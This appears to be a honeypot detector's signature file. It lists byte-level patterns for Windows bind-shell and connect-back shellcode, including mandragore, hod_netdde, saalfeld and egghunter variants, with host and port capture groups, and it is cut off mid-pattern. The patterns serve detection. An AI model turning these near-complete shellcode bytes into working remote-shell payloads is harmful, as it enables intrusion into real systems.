	"\\x8B\\x5F\\x24\\x01\\xEB\\x66\\x8B\\x0C\\x4B\\x8B\\x5F\\x1C\\x01\\xEB\\x03\\x2C\\x8B\\x89\\x6C\\x24"
	"\\x1C\\x61\\xC3\\x31\\xC0\\x64\\x8B\\x40\\x30\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\x5E"
	"\\x68\\x8E\\x4E\\x0E\\xEC\\x50\\xFF\\xD6\\x31\\xDB\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32"
	"\\x5F\\x54\\xFF\\xD0\\x68\\xCB\\xED\\xFC\\x3B\\x50\\xFF\\xD6\\x5F\\x89\\xE5\\x66\\x81\\xED\\x08\\x02"
	"\\x55\\x6A\\x02\\xFF\\xD0\\x68\\xD9\\x09\\xF5\\xAD\\x57\\xFF\\xD6\\x53\\x53\\x53\\x53\\x53\\x43\\x53"
	"\\x43\\x53\\xFF\\xD0\\x66\\x68(..)\\x66\\x53\\x89\\xE1\\x95\\x68\\xA4\\x1A\\x70\\xC7\\x57\\xFF"
	"\\xD6\\x6A\\x10\\x51\\x55\\xFF\\xD0\\x68\\xA4\\xAD\\x2E\\xE9\\x57\\xFF\\xD6\\x53\\x55\\xFF\\xD0\\x68"
	"\\xE5\\x49\\x86\\x49\\x57\\xFF\\xD6\\x50\\x54\\x54\\x55\\xFF\\xD0\\x93\\x68\\xE7\\x79\\xC6\\x79\\x57"
	"\\xFF\\xD6\\x55\\xFF\\xD0\\x66\\x6A\\x64\\x66\\x68\\x63\\x6D\\x89\\xE5\\x6A\\x50\\x59\\x29\\xCC\\x89";
/*
	actually the shellcode used here is crippled, the exit fn is missing :\
	"\\xE7\\x6A\\x44\\x89\\xE2\\x31\\xC0\\xF3\\xAA\\xFE\\x42\\x2D\\xFE\\x42\\x2C\\x93\\x8D\\x7A\\x38\\xAB"
	"\\xAB\\xAB\\x68\\x72\\xFE\\xB3\\x16\\xFF\\x75\\x44\\xFF\\xD6\\x5B\\x57\\x52\\x51\\x51\\x51\\x6A\\x01"
	"\\x51\\x51\\x55\\x51\\xFF\\xD0\\x68\\xAD\\xD9\\x05\\xCE\\x53\\xFF\\xD6\\x6A\\xFF\\xFF\\x37\\xFF\\xD0"
	"\\x8B\\x57\\xFC\\x83\\xC4\\x64\\xFF\\xD6\\x52\\xFF\\xD0\\x68\\xEF\\xCE\\xE0\\x60\\x53\\xFF\\xD6\\xFF"
	"\\xD0";
*/	
	mapping (none,port);
};



bindshell::mandragore
{
	pattern	
	"\\x64\\x67\\x8F\\x06\\x00\\x00\\xBE..."
	".\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\x15.."
	"..\\x97\\x99\\x52\\x52\\x52\\x52\\x42\\x52\\x42\\x52\\xE8\\x0B\\x00\\x00"
	"\\x00\\x57\\x53\\x41\\x53\\x6F\\x63\\x6B\\x65\\x74\\x41\\x00\\x57\\xFF\\x16\\xFF"
	"\\xD0\\x93\\x6A\\x00\\x68\\x02\\x00(..)\\x8B\\xC4\\x6A\\x10\\x50\\x53\\xE8"
	"\\x05\\x00\\x00\\x00\\x62\\x69\\x6E\\x64\\x00\\x57\\xFF\\x16\\xFF\\xD0\\x6A\\x01"
	"\\x53\\xE8\\x07\\x00\\x00\\x00\\x6C\\x69\\x73\\x74\\x65\\x6E\\x00\\x57\\xFF\\x16"
	"\\xFF\\xD0\\x6A\\x00\\x54\\x53\\xE8\\x07\\x00\\x00\\x00\\x61\\x63\\x63\\x65\\x70"
	"\\x74\\x00\\x57\\xFF\\x16\\xFF\\xD0\\x8B\\xD8\\x33\\xC0\\x6A\\x10\\x59\\x8B\\xFC"
	"\\x57\\x03\\xF9\\x57\\xF3\\xAB\\x8B\\x3C\\x24\\x50\\x50\\x50\\x6A\\x01\\x50\\x50"
	"\\xE8\\x04\\x00\\x00\\x00\\x63\\x6D\\x64\\x00\\x50\\xE8\\x0F\\x00\\x00\\x00\\x43"
	"\\x72\\x65\\x61\\x74\\x65\\x50\\x72\\x6F\\x63\\x65\\x73\\x73\\x41\\x00\\xC6\\x07"
	"\\x44\\xC7\\x47\\x2C\\x01\\x01\\x00\\x00\\x83\\xC7\\x38\\x93\\xAB\\xAB\\xAB\\x64"
	"\\x67\\xA1\\x30\\x00\\x8B\\x40\\x0C\\x8B\\x40\\x1C\\x8B\\x00\\xFF\\x70\\x08\\xFF"
	"\\x16\\xFF\\xD0";
	
	mapping (none,port);
};

bindshell::hod_netdde
{
	pattern
	"\\xEB\\x70\\x56\\x33\\xC0\\x64\\x8B\\x40\\x30\\x85\\xC0\\x78\\x0C\\x8B\\x40\\x0C"
	"\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\xEB\\x09\\x8B\\x40\\x34\\x8D\\x40\\x7C\\x8B"
	"\\x40\\x3C\\x5E\\xC3\\x60\\x8B\\x6C\\x24\\x24\\x8B\\x45\\x3C\\x8B\\x54\\x05\\x78"
	"\\x03\\xD5\\x8B\\x4A\\x18\\x8B\\x5A\\x20\\x03\\xDD\\xE3\\x34\\x49\\x8B\\x34\\x8B"
	"\\x03\\xF5\\x33\\xFF\\x33\\xC0\\xFC\\xAC\\x84\\xC0\\x74\\x07\\xC1\\xCF\\x0D\\x03"
	"\\xF8\\xEB\\xF4\\x3B\\x7C\\x24\\x28\\x75\\xE1\\x8B\\x5A\\x24\\x03\\xDD\\x66\\x8B"
	"\\x0C\\x4B\\x8B\\x5A\\x1C\\x03\\xDD\\x8B\\x04\\x8B\\x03\\xC5\\x89\\x44\\x24\\x1C"
	"\\x61\\xC3\\xEB\\x3D\\xAD\\x50\\x52\\xE8\\xA8\\xFF\\xFF\\xFF\\x89\\x07\\x83\\xC4"
	"\\x08\\x83\\xC7\\x04\\x3B\\xF1\\x75\\xEC\\xC3\\x8E\\x4E\\x0E\\xEC\\x72\\xFE\\xB3"
	"\\x16\\x7E\\xD8\\xE2\\x73\\xAD\\xD9\\x05\\xCE\\xD9\\x09\\xF5\\xAD\\xA4\\x1A\\x70"
	"\\xC7\\xA4\\xAD\\x2E\\xE9\\xE5\\x49\\x86\\x49\\xCB\\xED\\xFC\\x3B\\xE7\\x79\\xC6"
	"\\x79\\x83\\xEC\\x60\\x8B\\xEC\\xEB\\x02\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x5E"
	"\\xE8\\x3D\\xFF\\xFF\\xFF\\x8B\\xD0\\x83\\xEE\\x36\\x8D\\x7D\\x04\\x8B\\xCE\\x83"
	"\\xC1\\x10\\xE8\\x9D\\xFF\\xFF\\xFF\\x83\\xC1\\x18\\x33\\xC0\\x66\\xB8\\x33\\x32"
	"\\x50\\x68\\x77\\x73\\x32\\x5F\\x8B\\xDC\\x51\\x52\\x53\\xFF\\x55\\x04\\x5A\\x59"
	"\\x8B\\xD0\\xE8\\x7D\\xFF\\xFF\\xFF\\xB8\\x01\\x63\\x6D\\x64\\xC1\\xF8\\x08\\x50"
	"\\x89\\x65\\x34\\x33\\xC0\\x66\\xB8\\x90\\x01\\x2B\\xE0\\x54\\x83\\xC0\\x72\\x50"
	"\\xFF\\x55\\x24\\x33\\xC0\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xFF\\x55\\x14"
	"\\x8B\\xF0\\x33\\xC0\\x33\\xDB\\x50\\x50\\x50\\xB8\\x02\\x01(..)\\xFE\\xCC"
	"\\x50\\x8B\\xC4\\xB3\\x10\\x53\\x50\\x56\\xFF\\x55\\x18\\x53\\x56\\xFF\\x55\\x1C"
	"\\x53\\x8B\\xD4\\x2B\\xE3\\x8B\\xCC\\x52\\x51\\x56\\xFF\\x55\\x20\\x8B\\xF0\\x33"
	"\\xC9\\xB1\\x54\\x2B\\xE1\\x8B\\xFC\\x57\\x33\\xC0\\xF3\\xAA\\x5F\\xC6\\x07\\x44"
	"\\xFE\\x47\\x2D\\x57\\x8B\\xC6\\x8D\\x7F\\x38\\xAB\\xAB\\xAB\\x5F\\x33\\xC0\\x8D"
	"\\x77\\x44\\x56\\x57\\x50\\x50\\x50\\x40\\x50\\x48\\x50\\x50\\xFF\\x75\\x34\\x50"
	"\\xFF\\x55\\x08\\xF7\\xD0\\x50\\xFF\\x36\\xFF\\x55\\x10\\xFF\\x77\\x38\\xFF\\x55"
	"\\x28\\xFF\\x55";	
	mapping (none,port);
};


bindshell::saalfeld
{
	pattern
	"\\xE9\\x19\\x02\\x00\\x00\\x5A\\x8B\\xDA\\x83\\xEB\\x07\\x6A\\xFF\\x53\\x64\\xA1"
	"\\x00\\x00\\x00\\x00\\x50\\x64\\x89\\x25\\x00\\x00\\x00\\x00\\x33\\xDB\\xBB\\x00"
	"\\x00\\xE0\\x77\\xE8\\xDC\\x01\\x00\\x00\\x81\\xFB\\x00\\x00\\xFF\\xBF\\x0F\\x83"
	"\\xCE\\x01\\x00\\x00\\x81\\xC3\\x00\\x00\\x01\\x00\\x66\\x81\\x3B\\x4D\\x5A\\x75"
	"\\xE7\\x33\\xC0\\x8B\\x43\\x3C\\x03\\xC3\\x66\\x81\\x38\\x50\\x45\\x75\\xD9\\x83"
	"\\xC0\\x78\\x8B\\x30\\x03\\xF3\\x8B\\x4E\\x0C\\x03\\xCB\\x81\\x39\\x4B\\x45\\x52"
	"\\x4E\\x75\\xC5\\x81\\x79\\x04\\x45\\x4C\\x33\\x32\\x75\\xBC\\x33\\xFF\\x8B\\x46"
	"\\x20\\x03\\xC3\\x8B\\xCB\\x03\\x08\\x81\\x39\\x47\\x65\\x74\\x50\\x75\\x09\\x81"
	"\\x79\\x04\\x72\\x6F\\x63\\x41\\x74\\x06\\x47\\x83\\xC0\\x04\\xEB\\xE5\\x03\\xFF"
	"\\x03\\xFB\\x8B\\x56\\x24\\x03\\xFA\\x33\\xD2\\x66\\x8B\\x17\\x8B\\xFA\\x8B\\x46"
	"\\x10\\x48\\x03\\xF8\\x33\\xC9\\x8B\\xCF\\x03\\xC9\\x03\\xC9\\x03\\x4E\\x1C\\x03"
	"\\xCB\\x8B\\x39\\x03\\xFB\\xE9\\x69\\x01\\x00\\x00\\x5E\\x87\\xF7\\x8B\\xD7\\x33"
	"\\xC0\\xF7\\xD0\\x8B\\xC8\\xF2\\xAF\\x89\\x32\\x8D\\x42\\x08\\x52\\x50\\x53\\xFF"
	"\\x12\\x5A\\x89\\x42\\x04\\x8D\\x72\\x15\\x52\\x56\\xFF\\x52\\x04\\x5A\\x33\\xC0"
	"\\xAC\\x84\\xC0\\x75\\xF9\\x33\\xC9\\x8A\\x0E\\x84\\xC9\\x74\\x09\\x52\\x56\\x53"
	"\\xFF\\x12\\x5A\\xAB\\xE2\\xE8\\x46\\x52\\x56\\xFF\\x52\\x04\\x5A\\x8B\\xD8\\x33"
	"\\xC0\\xAC\\x84\\xC0\\x75\\xF9\\x33\\xC9\\x8A\\x0E\\x80\\xF9\\x02\\x74\\x09\\x52"
	"\\x56\\x53\\xFF\\x12\\x5A\\xAB\\xE2\\xE7\\x33\\xC0\\x50\\x40\\x50\\x40\\x50\\xFF"
	"\\x57\\xE8\\x93\\x6A\\x10\\x56\\x53\\xFF\\x57\\xEC\\x6A\\x02\\x53\\xFF\\x57\\xF0"
	"\\x33\\xC0\\x57\\x50\\xB0\\x0C\\xAB\\x58\\xAB\\x40\\xAB\\x5F\\x48\\x50\\x57\\x56"
	"\\xAD\\x56\\xFF\\x57\\xC0\\x48\\x50\\x57\\xAD\\x56\\xAD\\x56\\xFF\\x57\\xC0\\x48"
	"\\xB0\\x44\\x89\\x07\\x57\\xFF\\x57\\xC4\\x33\\xC0\\x8B\\x46\\xF4\\x89\\x47\\x3C"
	"\\x89\\x47\\x40\\x8B\\x06\\x89\\x47\\x38\\x33\\xC0\\x66\\xB8\\x01\\x01\\x89\\x47"
	"\\x2C\\x57\\x57\\x33\\xC0\\x50\\x50\\x50\\x40\\x50\\x48\\x50\\x50\\xAD\\x56\\x33"
	"\\xC0\\x50\\xFF\\x57\\xC8\\xFF\\x76\\xF0\\xFF\\x57\\xCC\\xFF\\x76\\xFC\\xFF\\x57"
	"\\xCC\\x48\\x50\\x50\\x53\\xFF\\x57\\xF4\\x8B\\xD8\\x33\\xC0\\xB4\\x04\\x50\\xC1"
	"\\xE8\\x04\\x50\\xFF\\x57\\xD4\\x8B\\xF0\\x33\\xC0\\x8B\\xC8\\xB5\\x04\\x50\\x50"
	"\\x57\\x51\\x56\\xFF\\x77\\xA8\\xFF\\x57\\xD0\\x83\\x3F\\x01\\x7C\\x22\\x33\\xC0"
	"\\x50\\x57\\xFF\\x37\\x56\\xFF\\x77\\xA8\\xFF\\x57\\xDC\\x0B\\xC0\\x74\\x2F\\x33"
	"\\xC0\\x50\\xFF\\x37\\x56\\x53\\xFF\\x57\\xF8\\x6A\\x50\\xFF\\x57\\xE0\\xEB\\xC8"
	"\\x33\\xC0\\x50\\xB4\\x04\\x50\\x56\\x53\\xFF\\x57\\xFC\\x57\\x33\\xC9\\x51\\x50"
	"\\x56\\xFF\\x77\\xAC\\xFF\\x57\\xD8\\x6A\\x50\\xFF\\x57\\xE0\\xEB\\xAA\\x50\\xFF"
	"\\x57\\xE4\\xEB\\xFE\\x58\\x50\\x89\\x42\\xF2\\xC3\\x8B\\x44\\x24\\x0C\\x05\\xB8"
	"\\x00\\x00\\x00\\xC7\\x00\\x78\\x56\\x34\\x12\\x33\\xC0\\xC3\\xEB\\xEC\\xE8\\xE2"
	"\\xFD\\xFF\\xFF\\xE8\\x92\\xFE\\xFF\\xFF\\x4B\\x56\\xE7\\x77\\x23\\x80\\xE7\\x77"
	"\\x4C\\x6F\\x61\\x64\\x4C\\x69\\x62\\x72\\x61\\x72\\x79\\x41\\x00\\x4B\\x45\\x52"
	"\\x4E\\x45\\x4C\\x33\\x32\\x00\\x43\\x72\\x65\\x61\\x74\\x65\\x50\\x69\\x70\\x65"
	"\\x00\\x47\\x65\\x74\\x53\\x74\\x61\\x72\\x74\\x75\\x70\\x49\\x6E\\x66\\x6F\\x41"
	"\\x00\\x43\\x72\\x65\\x61\\x74\\x65\\x50\\x72\\x6F\\x63\\x65\\x73\\x73\\x41\\x00"
	"\\x43\\x6C\\x6F\\x73\\x65\\x48\\x61\\x6E\\x64\\x6C\\x65\\x00\\x50\\x65\\x65\\x6B"
	"\\x4E\\x61\\x6D\\x65\\x64\\x50\\x69\\x70\\x65\\x00\\x47\\x6C\\x6F\\x62\\x61\\x6C"
	"\\x41\\x6C\\x6C\\x6F\\x63\\x00\\x57\\x72\\x69\\x74\\x65\\x46\\x69\\x6C\\x65\\x00"
	"\\x52\\x65\\x61\\x64\\x46\\x69\\x6C\\x65\\x00\\x53\\x6C\\x65\\x65\\x70\\x00\\x45"
	"\\x78\\x69\\x74\\x50\\x72\\x6F\\x63\\x65\\x73\\x73\\x00\\x00\\x57\\x53\\x4F\\x43"
	"\\x4B\\x33\\x32\\x00\\x73\\x6F\\x63\\x6B\\x65\\x74\\x00\\x62\\x69\\x6E\\x64\\x00"
	"\\x6C\\x69\\x73\\x74\\x65\\x6E\\x00\\x61\\x63\\x63\\x65\\x70\\x74\\x00\\x73\\x65"
	"\\x6E\\x64\\x00\\x72\\x65\\x63\\x76\\x00\\x02\\x00(..)";
	mapping (none,port);
	
//	reference "http://nepenthes.mwcollect.org/csni:shellcodes:saalfeld";
};



bindshell::augsburg
{
	pattern
	"\\x6A\\xEB\\x4D\\xE8\\xF9\\xFF\\xFF\\xFF\\x60\\x8B\\x6C\\x24\\x24\\x8B\\x45\\x3C\\x8B\\x7C\\x05\\x78\\x01\\xEF\\x8B\\x4F\\x18\\x8B\\x5F\\x20\\x01\\xEB\\x49\\x8B"
	"\\x34\\x8B\\x01\\xEE\\x31\\xC0\\x99\\xAC\\x84\\xC0\\x74\\x07\\xC1\\xCA\\x0D\\x01\\xC2\\xEB\\xF4\\x3B\\x54\\x24\\x28\\x75\\xE5\\x8B\\x5F\\x24\\x01\\xEB\\x66\\x8B"
	"\\x0C\\x4B\\x8B\\x5F\\x1C\\x01\\xEB\\x03\\x2C\\x8B\\x89\\x6C\\x24\\x1C\\x61\\xC3\\x31\\xDB\\x64\\x8B\\x43\\x30\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08"
	"\\x5E\\x68\\x8E\\x4E\\x0E\\xEC\\x50\\xFF\\xD6\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\xD0\\x68\\xCB\\xED\\xFC\\x3B\\x50\\xFF\\xD6\\x5F"
	"\\x89\\xE5\\x66\\x81\\xED\\x08\\x02\\x55\\x6A\\x02\\xFF\\xD0\\x68\\xD9\\x09\\xF5\\xAD\\x57\\xFF\\xD6\\x53\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xFF\\xD0\\x66"
	"\\x68(..)\\x66\\x53\\x89\\xE1\\x95\\x68\\xA4\\x1A\\x70\\xC7\\x57\\xFF\\xD6\\x6A\\x10\\x51\\x55\\xFF\\xD0\\x68\\xA4\\xAD\\x2E\\xE9\\x57\\xFF\\xD6\\x53\\x55"
	"\\xFF\\xD0\\x68\\xE5\\x49\\x86\\x49\\x57\\xFF\\xD6\\x50\\x54\\x54\\x55\\xFF\\xD0\\x93\\x68\\xE7\\x79\\xC6\\x79\\x57\\xFF\\xD6\\x55\\xFF\\xD0\\x66\\x6A\\x64\\x66"
	"\\x68\\x63\\x6D\\x89\\xE5\\x6A\\x50\\x59\\x29\\xCC\\x89\\xE7\\x6A\\x44\\x89\\xE2\\x31\\xC0\\xF3\\xAA\\xFE\\x42\\x2D\\xFE\\x42\\x2C\\x93\\x8D\\x7A\\x38\\xAB\\xAB"
	"\\xAB\\x68\\x72\\xFE\\xB3\\x16\\xFF\\x75\\x44\\xFF\\xD6\\x5B\\x57\\x52\\x51\\x51\\x51\\x6A\\x01\\x51\\x51\\x55\\x51\\xFF\\xD0\\x68\\xAD\\xD9\\x05\\xCE\\x53\\xFF"
	"\\xD6\\x6A\\xFF\\xFF\\x37\\xFF\\xD0\\x8B\\x57\\xFC\\x83\\xC4\\x64\\xFF\\xD6\\x52\\xFF\\xD0\\x68\\xF0\\x8A\\x04\\x5F\\x53\\xFF\\xD6\\xFF\\xD0";
	mapping (none,port);
};


connectbackshell::mandragore
{
	pattern
	"\\x64\\x67\\x8F\\x06\\x00\\x00\\xBE..."
	".\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\x15.."
	"..\\x97\\x99\\x52\\x52\\x52\\x52\\x42\\x52\\x42\\x52\\xE8\\x0B\\x00\\x00"
	"\\x00\\x57\\x53\\x41\\x53\\x6F\\x63\\x6B\\x65\\x74\\x41\\x00\\x57\\xFF\\x16\\xFF"
	"\\xD0\\x93\\x68(....)\\x68\\x02\\x00(..)\\x8B\\xC4\\x6A\\x10"
	"\\x50\\x53\\xE8\\x08\\x00\\x00\\x00\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x00\\x57"
	"\\xFF\\x16\\xFF\\xD0\\x6A\\x10\\x59\\x8B\\xFC\\x57\\x03\\xF9\\x57\\xF3\\xAB\\x8B"
	"\\x3C\\x24\\x50\\x50\\x50\\x6A\\x01\\x50\\x50\\xE8\\x04\\x00\\x00\\x00\\x63\\x6D"
	"\\x64\\x00\\x50\\xE8\\x0F\\x00\\x00\\x00\\x43\\x72\\x65\\x61\\x74\\x65\\x50\\x72"
	"\\x6F\\x63\\x65\\x73\\x73\\x41\\x00\\xC6\\x07\\x44\\xC7\\x47\\x2C\\x01\\x01\\x00"
	"\\x00\\x83\\xC7\\x38\\x93\\xAB\\xAB\\xAB\\x64\\x67\\xA1\\x30\\x00\\x8B\\x40\\x0C"
	"\\x8B\\x40\\x1C\\x8B\\x00\\xFF\\x70\\x08\\xFF\\x16\\xFF\\xD0";
	mapping (none,host,port);
};


connectbackshell::hod_netdde
{
	pattern
	"\\xEB\\x70\\x56\\x33\\xC0\\x64\\x8B\\x40\\x30\\x85\\xC0\\x78\\x0C\\x8B\\x40\\x0C"
	"\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\xEB\\x09\\x8B\\x40\\x34\\x8D\\x40\\x7C\\x8B"
	"\\x40\\x3C\\x5E\\xC3\\x60\\x8B\\x6C\\x24\\x24\\x8B\\x45\\x3C\\x8B\\x54\\x05\\x78"
	"\\x03\\xD5\\x8B\\x4A\\x18\\x8B\\x5A\\x20\\x03\\xDD\\xE3\\x34\\x49\\x8B\\x34\\x8B"
	"\\x03\\xF5\\x33\\xFF\\x33\\xC0\\xFC\\xAC\\x84\\xC0\\x74\\x07\\xC1\\xCF\\x0D\\x03"
	"\\xF8\\xEB\\xF4\\x3B\\x7C\\x24\\x28\\x75\\xE1\\x8B\\x5A\\x24\\x03\\xDD\\x66\\x8B"
	"\\x0C\\x4B\\x8B\\x5A\\x1C\\x03\\xDD\\x8B\\x04\\x8B\\x03\\xC5\\x89\\x44\\x24\\x1C"
	"\\x61\\xC3\\xEB\\x35\\xAD\\x50\\x52\\xE8\\xA8\\xFF\\xFF\\xFF\\x89\\x07\\x83\\xC4"
	"\\x08\\x83\\xC7\\x04\\x3B\\xF1\\x75\\xEC\\xC3\\x8E\\x4E\\x0E\\xEC\\x72\\xFE\\xB3"
	"\\x16\\x7E\\xD8\\xE2\\x73\\xAD\\xD9\\x05\\xCE\\xD9\\x09\\xF5\\xAD\\xEC\\xF9\\xAA"
	"\\x60\\xCB\\xED\\xFC\\x3B\\xE7\\x79\\xC6\\x79\\x83\\xEC\\x60\\x8B\\xEC\\xEB\\x02"
	"\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x5E\\xE8\\x45\\xFF\\xFF\\xFF\\x8B\\xD0\\x83"
	"\\xEE\\x2E\\x8D\\x7D\\x04\\x8B\\xCE\\x83\\xC1\\x10\\xE8\\xA5\\xFF\\xFF\\xFF\\x83"
	"\\xC1\\x10\\x33\\xC0\\x66\\xB8\\x33\\x32\\x50\\x68\\x77\\x73\\x32\\x5F\\x8B\\xDC"
	"\\x51\\x52\\x53\\xFF\\x55\\x04\\x5A\\x59\\x8B\\xD0\\xE8\\x85\\xFF\\xFF\\xFF\\xB8"
	"\\x01\\x63\\x6D\\x64\\xC1\\xF8\\x08\\x50\\x89\\x65\\x30\\x33\\xC0\\x66\\xB8\\x90"
	"\\x01\\x2B\\xE0\\x54\\x83\\xC0\\x72\\x50\\xFF\\x55\\x1C\\x33\\xC0\\x50\\x50\\x50"
	"\\x50\\x40\\x50\\x40\\x50\\xFF\\x55\\x14\\x8B\\xF0\\x68(....)\\xB8"
	"\\x02\\x01(..)\\xFE\\xCC\\x50\\x8B\\xDC\\x33\\xC0\\xB0\\x10\\x50\\x53\\x56"
	"\\xFF\\x55\\x18\\x33\\xC9\\xB1\\x54\\x2B\\xE1\\x8B\\xFC\\x57\\x33\\xC0\\xF3\\xAA"
	"\\x5F\\xC6\\x07\\x44\\xFE\\x47\\x2D\\x57\\x8B\\xC6\\x8D\\x7F\\x38\\xAB\\xAB\\xAB"
	"\\x5F\\x33\\xC0\\x8D\\x77\\x44\\x56\\x57\\x50\\x50\\x50\\x40\\x50\\x48\\x50\\x50"
	"\\xFF\\x75\\x30\\x50\\xFF\\x55\\x08\\xF7\\xD0\\x50\\xFF\\x36\\xFF\\x55\\x10\\xFF"
	"\\x77\\x38\\xFF\\x55\\x20\\xFF\\x55";
	mapping (none,host,port);
};


connectbackshell::bielefeld
{
	pattern
	"\\xc7\\x02\\x63\\x6d\\x64\\x00\\x52\\x50\\xff\\x57\\xe8\\xc7\\x07\\x02\\x00(..)\\xc7\\x47\\x04"
	"(....)\\x6a\\x10\\x57\\x53\\xff\\x57\\xf8\\x53\\xff\\x57\\xfc\\x50\\xff\\x57\\xec";
	mapping (none,port,host);
};


connectbackshell::konstanz
{
	pattern
	"\\xff\\xd0\\x68(....)\\x66\\x68(..)\\x66\\x53\\x89\\xe1\\x95\\x68\\xec\\xf9\\xaa\\x60\\x57\\xff\\xd6"
	"\\x6a\\x10\\x51\\x55\\xff\\xd0";
	mapping (none,host,port);    
};  


connectbackshell::egghunter
{
	pattern     
	"\\x41\\x42\\x41\\x42\\x41\\x42\\x41\\x42\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xFC\\x6A\\xEB"
	"\\x52\\xE8\\xF9\\xFF\\xFF\\xFF\\x60\\x8B\\x6C\\x24\\x24\\x8B\\x45\\x3C\\x8B\\x7C\\x05\\x78\\x01\\xEF"
	"\\x83\\xC7\\x01\\x8B\\x4F\\x17\\x8B\\x5F\\x1F\\x01\\xEB\\xE3\\x30\\x49\\x8B\\x34\\x8B\\x01\\xEE\\x31"
	"\\xC0\\x99\\xAC\\x84\\xC0\\x74\\x07\\xC1\\xCA\\x0D\\x01\\xC2\\xEB\\xF4\\x3B\\x54\\x24\\x28\\x75\\xE3"
	"\\x8B\\x5F\\x23\\x01\\xEB\\x66\\x8B\\x0C\\x4B\\x8B\\x5F\\x1B\\x01\\xEB\\x03\\x2C\\x8B\\x89\\x6C\\x24"
	"\\x1C\\x61\\xC3\\x31\\xC0\\x64\\x8B\\x40\\x30\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\x5E"
	"\\x68\\x8E\\x4E\\x0E\\xEC\\x50\\xFF\\xD6\\x31\\xDB\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32"
	"\\x5F\\x54\\xFF\\xD0\\x68\\xCB\\xED\\xFC\\x3B\\x50\\xFF\\xD6\\x5F\\x89\\xE5\\x66\\x81\\xED\\x08\\x02"
	"\\x55\\x6A\\x02\\xFF\\xD0\\x68\\xD9\\x09\\xF5\\xAD\\x57\\xFF\\xD6\\x53\\x53\\x53\\x53\\x43\\x53\\x43"
	"\\x53\\xFF\\xD0\\x68(....)\\x66\\x68(..)\\x66\\x53\\x89\\xE1\\x95\\x68\\xEC\\xF9\\xAA\\x60\\x57\\xFF"
	"\\xD6\\x6A\\x10\\x51\\x55\\xFF\\xD0\\x66\\x6A\\x64\\x66\\x68\\x63\\x6D\\x6A\\x50\\x59\\x29\\xCC\\x89"
	"\\xE7\\x6A\\x44\\x89\\xE2\\x31\\xC0\\xF3\\xAA\\x95\\x89\\xFD\\xFE\\x42\\x2D\\xFE\\x42\\x2C\\x8D\\x7A"
	"\\x38\\xAB\\xAB\\xAB\\x68\\x72\\xFE\\xB3\\x16\\xFF\\x75\\x28\\xFF\\xD6\\x5B\\x57\\x52\\x51\\x51\\x51"
	"\\x6A\\x01\\x51\\x51\\x55\\x51\\xFF\\xD0\\x68\\xAD\\xD9\\x05\\xCE\\x53\\xFF\\xD6\\x6A\\xFF\\xFF\\x37"
	"\\xFF\\xD0\\x68\\xE7\\x79\\xC6\\x79\\xFF\\x75\\x04\\xFF\\xD6\\xFF\\x77\\xFC\\xFF\\xD0\\x68\\xEF\\xCE"
	"\\xE0\\x60\\x53\\xFF\\xD6\\xFF\\xD0";
	mapping (none,host,port);    
};  

connectbackshell::langenfeld
{
	pattern
	"\\xE9\\xF4\\x00\\x00\\x00\\x5A\\xB8\\x0C\\xF0\\xFD\\x7F\\x8B\\x00\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08"
	"\\x8B\\xD8\\x8B\\x73\\x3C\\x03\\xF3\\x8B\\x76\\x78\\x03\\xF3\\x8B\\x7E\\x20\\x03\\xFB\\x8B\\x4E\\x14"
	"\\x33\\xED\\x56\\x57\\x51\\x8B\\x3F\\x03\\xFB\\x8B\\xF2\\x6A\\x0E\\x59\\xF3\\xA6\\x74\\x08\\x59\\x5F"
	"\\x83\\xC7\\x04\\x45\\xE2\\xE9\\x59\\x5F\\x5E\\x8B\\xCD\\x8B\\x46\\x24\\x03\\xC3\\xD1\\xE1\\x03\\xC1"
	"\\x33\\xC9\\x66\\x8B\\x08\\x8B\\x46\\x1C\\x03\\xC3\\xC1\\xE1\\x02\\x03\\xC1\\x8B\\x00\\x03\\xC3\\x8B"
	"\\xFA\\x8B\\xF7\\x83\\xC6\\x0E\\x8B\\xD0\\x6A\\x03\\x59\\xE8\\x70\\x00\\x00\\x00\\x83\\xC6\\x0D\\x52"
	"\\x56\\xFF\\x57\\xFC\\x5A\\x8B\\xD8\\x6A\\x02\\x59\\xE8\\x5D\\x00\\x00\\x00\\x83\\xEC\\x44\\x8B\\xF4"
	"\\x6A\\x10\\x59\\x89\\x04\\x8E\\xE2\\xFB\\x50\\x50\\x50\\x50\\x6A\\x01\\x6A\\x02\\xFF\\x57\\xF8\\x8B"
	"\\xD8\\x89\\x5E\\x38\\x89\\x5E\\x3C\\x89\\x5E\\x40\\x66\\xC7\\x46\\x2C\\x01\\x01\\x8D\\x47\\x10\\x50"
	"\\x56\\x33\\xC0\\x50\\x50\\x50\\x6A\\x01\\x50\\x50\\x8D\\x57\\x3C\\xC7\\x02\\x63\\x6D\\x64\\x00\\x52"
	"\\x50\\xFF\\x57\\xEC\\xC7\\x07\\x02\\x00(..)\\xC7\\x47\\x04(....)\\x6A\\x10\\x57\\x53\\xFF\\x57\\xFC"
	"\\x50\\xFF\\x57\\xF0";
	mapping (none,port,host);    
};  

connectbackshell::pinneberg
{
	pattern
	"\\xE8\\x04\\x01\\x00\\x00\\x89\\x46\\x04\\xFF\\x36\\x68\\x72\\xFE\\xB3\\x16\\xE8\\xF5\\x00\\x00\\x00"
	"\\x89\\x46\\x08\\xFF\\x36\\x68\\xEF\\xCE\\xE0\\x60\\xE8\\xE6\\x00\\x00\\x00\\x89\\x46\\x0C\\x68\\x33"
